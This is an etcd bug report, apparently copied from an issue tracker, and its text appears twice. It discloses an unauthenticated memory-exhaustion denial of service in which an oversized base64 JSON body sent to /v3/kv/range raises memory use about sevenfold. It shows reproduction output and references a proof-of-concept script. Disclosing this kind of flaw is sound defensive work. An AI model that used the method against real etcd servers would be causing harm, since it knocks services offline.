Bug report criteria
What happened?
(duplicating my original security report below as per discussion on our email chain this will be handled as a non-security bug report)
Summary
A remote unauthenticated attacker can trigger large, retained memory allocations in etcd by sending an oversized HTTP/JSON request body to the gRPC-gateway endpoint (for example /v3/kv/range). This can lead to memory-exhaustion DoS and potential OOM/service outage by increasing memory use ~7x of the attacker payload.
Details
etcd enables the gRPC-gateway HTTP API under /v3/ by default. The gateway decodes JSON requests containing base64-encoded byte fields. By sending an extremely large base64 string, an attacker can force etcd to allocate a very large heap (GiB-scale observed) even when the request is unauthorized.
In the PoC below, a single unauthenticated 256 MiB HTTP/JSON request to /v3/kv/range caused etcd RSS to increase by ~1.75 GiB, ~7x the request body size and remain elevated at that level at least 10 seconds after request completion, even though the server returned HTTP/1.1 429 Too Many Requests.
Impact
Unauthenticated remote memory-exhaustion DoS against etcd client endpoints that are reachable by the attacker. This is especially impactful for containerized deployments with tight memory limits.
Suggested severity: High, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)
What did you expect to happen?
etcd should enforce request-size limits (e.g., --max-request-bytes) before unmarshalling the json, thus disallowing the attacker to a) drive so much memory via the request directly and b) amplify the usage 7x.
How can we reproduce it (as minimally and precisely as possible)?
PoC
repro-http-huge.py
1. Adjust the attached PoC to point at the right paths for ETCD_BIN (see the top-level const definitions for other tunables too).
2. Run python ./repro-http-huge.py
4. Expected output:
*** LAUNCH A FRESH SINGLE-NODE ETCD FOR THE HTTP GATEWAY MEMORY TEST ***$ /usr/local/bin/vh-etcd --name vh1 --data-dir /tmp/vh-repro-etcd-f001-data --listen-client-urls http://127.0.0.1:2379 --advertise-client-urls http://127.0.0.1:2379 --listen-peer-urls http://127.0.0.1:2380 --initial-advertise-peer-urls http://127.0.0.1:2380 --initial-cluster vh1=http://127.0.0.1:2380 --initial-cluster-state new --log-level info
*** CAPTURE BASELINE RSS BEFORE THE OVERSIZED HTTP/JSON REQUEST ***
rss_before_kib=29816
*** SEND ONE OVERSIZED HTTP/JSON REQUEST TO /V3/KV/RANGE ***
target=http://127.0.0.1:2379/v3/kv/range
base64_key_len=268435456
status_line=HTTP/1.1 429 Too Many Requests
*** CAPTURE RSS 10 SECONDS AFTER THE OVERSIZED REQUEST ***
rss_after_kib=1869404
rss_delta_kib=1839588
Anything else we need to know?
No response
Etcd version (please run commands below)
reproduced on etcd 3.6.7, 3.6.8, and main commit c3aff5680d237116bcf1fe59d4a90eea93add2c7
Etcd configuration (command line flags or environment variables)
No response
Etcd debug information (please run commands below, feel free to obfuscate the IP address or FQDN in the output)
No response
Relevant log output
Bug report criteria
What happened?
(duplicating my original security report below as per discussion on our email chain this will be handled as a non-security bug report)
Summary
A remote unauthenticated attacker can trigger large, retained memory allocations in etcd by sending an oversized HTTP/JSON request body to the gRPC-gateway endpoint (for example /v3/kv/range). This can lead to memory-exhaustion DoS and potential OOM/service outage by increasing memory use ~7x of the attacker payload.
Details
etcd enables the gRPC-gateway HTTP API under /v3/ by default. The gateway decodes JSON requests containing base64-encoded byte fields. By sending an extremely large base64 string, an attacker can force etcd to allocate a very large heap (GiB-scale observed) even when the request is unauthorized.
In the PoC below, a single unauthenticated 256 MiB HTTP/JSON request to /v3/kv/range caused etcd RSS to increase by ~1.75 GiB, ~7x the request body size and remain elevated at that level at least 10 seconds after request completion, even though the server returned HTTP/1.1 429 Too Many Requests.
Impact
Unauthenticated remote memory-exhaustion DoS against etcd client endpoints that are reachable by the attacker. This is especially impactful for containerized deployments with tight memory limits.
Suggested severity: High, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5)
What did you expect to happen?
etcd should enforce request-size limits (e.g., --max-request-bytes) before unmarshalling the json, thus disallowing the attacker to a) drive so much memory via the request directly and b) amplify the usage 7x.
How can we reproduce it (as minimally and precisely as possible)?
PoC
repro-http-huge.py
1. Adjust the attached PoC to point at the right paths for ETCD_BIN (see the top-level const definitions for other tunables too).
2. Run python ./repro-http-huge.py
4. Expected output:
Anything else we need to know?
No response
Etcd version (please run commands below)
reproduced on etcd 3.6.7, 3.6.8, and main commit c3aff5680d237116bcf1fe59d4a90eea93add2c7
Etcd configuration (command line flags or environment variables)
No response
Etcd debug information (please run commands below, feel free to obfuscate the IP address or FQDN in the output)
No response
Relevant log output